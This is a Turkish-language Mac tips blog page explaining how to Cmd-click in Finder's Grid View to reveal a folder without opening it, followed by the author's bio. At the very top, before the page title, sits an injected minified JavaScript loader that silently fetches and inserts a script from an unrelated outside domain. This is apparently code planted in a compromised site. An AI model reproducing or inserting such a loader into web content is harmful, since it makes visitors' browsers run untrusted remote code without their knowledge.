;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Izgara Görünümünde Dosyaya Ulaşmak - elmasuyu.net
Kategoriler
ipucu Mac OS X

Izgara Görünümünde Dosyaya Ulaşmak

Mac OS X 10.5 ile hayatımıza giren Grid View yani Izgara Görünümü dosyalarınıza ulaşmanın en güzel ve çekici yollarından biri. Lakin gerekli ipuçlarını bilemiyorsanız o zaman bazen canınızı sıkabilecek bir duruma bürünebiliyor. Mesela, ızgara görünümündeki bir klasöre ulaşmak istediğinizde otomatik olarak size klasörün içeriğini gösteriyor. "Ama ben klasörü açmak istemiyorum, onun sadece bulunduğu dizindeki durumuna bakmak istiyorum" dediğinizde olay değişiyor. Şimdi bunun için ne yapacağız?

Yapmanız gereken tek şey Finder penceresi içinde görmek istediğiniz dosyaya tıklarken KOMUT veya CMD tuşuna basmak. Hepsi bu kadar!

 

 

Yazar Cem YENER

ElmaSuyu.Net Yöneticisi - Site faaliyetlerinin yanında bilgisayar dünyası ile yakından ilgili. Mac ve iOS özellikle ilgilendi konulardır.
Üniversite Program Koordinatörü - Bir devlet üniversitesinin İngilizce Hazırlık Programı Koordinatörü ve Akademik Direktörlüğünü yürütmekte.
@jamwinner